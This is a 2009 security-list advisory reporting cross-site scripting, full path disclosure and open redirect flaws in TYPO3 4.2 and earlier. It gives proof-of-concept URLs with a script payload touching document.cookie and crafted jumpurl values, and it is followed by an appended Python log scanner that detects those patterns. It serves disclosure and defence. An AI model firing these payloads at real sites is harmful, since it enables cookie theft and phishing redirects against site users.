SECURITYVULNS:DOC:22867
Dec 04, 2009 - 12:00 a.m.

Vulnerabilities in TYPO3

Hello 3APA3A!

I want to warn you about security vulnerabilities in TYPO3.

These are Cross-Site Scripting, Full path disclosure and Redirector vulnerabilities.

XSS:

http://site/index.php?id=49&sword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/nc/search-result/start/1.html?tx_ttproducts_pi1%5Bsword%5D=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/index.php?jumpurl=%0A1

Redirector:

http://site/index.php?jumpurl=http://websecurity.com.ua

TYPO3 4.2 and previous versions are vulnerable.

I mentioned these vulnerabilities on my site (http://websecurity.com.ua/3558/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
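
The three request patterns listed in the advisory, expressed as an access-log check. This is an added example, not part of the original message or of TYPO3; the host name `site`, the finding labels and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

SITE_HOST = "site"  # assumption: the placeholder host from the advisory's URLs
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(request_target, site_host=SITE_HOST):
    """Return labels (hypothetical names) for the advisory patterns a request matches."""
    findings = set()
    # parse_qsl percent-decodes parameter names and values.
    for name, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        if name == "sword" or name.endswith("[sword]"):
            # Markup or double-quote characters in a search word: the XSS requests.
            if any(c in value for c in '<>"'):
                findings.add("xss-sword")
        elif name == "jumpurl":
            # Control characters (e.g. %0A): the full path disclosure request.
            if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
                findings.add("jumpurl-control-char")
            try:
                target = urlsplit(value.strip())
            except ValueError:
                findings.add("jumpurl-malformed")
                continue
            # Absolute or protocol-relative target on another host: the redirector.
            if target.netloc and target.hostname != site_host:
                findings.add("jumpurl-external")
    return findings

def scan(log_lines):
    """Return (request target, sorted labels) for every flagged log line."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        found = classify(match.group(1)) if match else set()
        if found:
            hits.append((match.group(1), sorted(found)))
    return hits

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Dec/2009:10:00:00 +0000] "GET /index.php?id=49&sword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5120',
    '192.0.2.10 - - [04/Dec/2009:10:00:05 +0000] "GET /index.php?jumpurl=%0A1 HTTP/1.1" 200 312',
    '192.0.2.10 - - [04/Dec/2009:10:00:09 +0000] "GET /index.php?jumpurl=http://websecurity.com.ua HTTP/1.1" 302 0',
    '192.0.2.11 - - [04/Dec/2009:10:01:00 +0000] "GET /index.php?id=49&sword=typo3 HTTP/1.1" 200 4980',
    '192.0.2.11 - - [04/Dec/2009:10:01:04 +0000] "GET /index.php?jumpurl=http://site/about.html HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for target, labels in scan(SAMPLE_LOG):
        print(labels, target)
```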